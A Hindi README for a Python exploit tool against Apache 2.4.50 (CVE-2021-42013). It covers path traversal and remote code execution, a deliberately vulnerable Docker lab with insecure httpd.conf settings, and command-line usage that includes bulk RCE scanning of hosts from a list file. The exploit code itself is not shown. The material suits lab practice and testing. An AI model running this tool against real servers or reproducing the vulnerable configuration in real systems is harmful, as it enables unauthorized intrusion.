
Apache 2.4.50 CVE-2021-42013 के लिए पथ ट्रैवर्सल और रिमोट कोड निष्पादन का Python एक्सप्लॉइट स्क्रिप्ट, जिसमें बल्क स्कैनिंग और व्यावहारिक परीक्षण के लिए Docker लैब शामिल है।
CVE-2021-42013.py एक पायथन स्क्रिप्ट है जो Apache 2.4.50 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन कमजोरी खोजने में मदद करेगी। CVE-2021-42013 पर हाथ आजमाने के लिए Docker का कमजोर उदाहरण प्रदान किया गया है।
यदि CGI-BIN सक्षम है तो हम रिमोट कोड निष्पादन कर सकते हैं लेकिन पथ ट्रैवर्सल नहीं, इसलिए पथ ट्रैवर्सल कमजोरी की जांच के लिए httpd.conf में Alias अनुभाग के अंतर्गत "icons" निर्देशिका जोड़ी गई है।
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-42013 .
$ docker run -it cve-2021-42013
$ python3 cve-2021-42013.py -u http://172.17.0.2
$ python3 cve-2021-42013.py -u http://172.17.0.2 -pt
$ python3 cve-2021-42013.py -u http://172.17.0.2 -rce
$ python3 cve-2021-42013.py -l list.txt
$ python3 cve-2021-42013.py -l list.txt -pt
$ python3 cve-2021-42013.py -l list.txt -rce
अधिक जानकारी यहाँ पाई जा सकती है।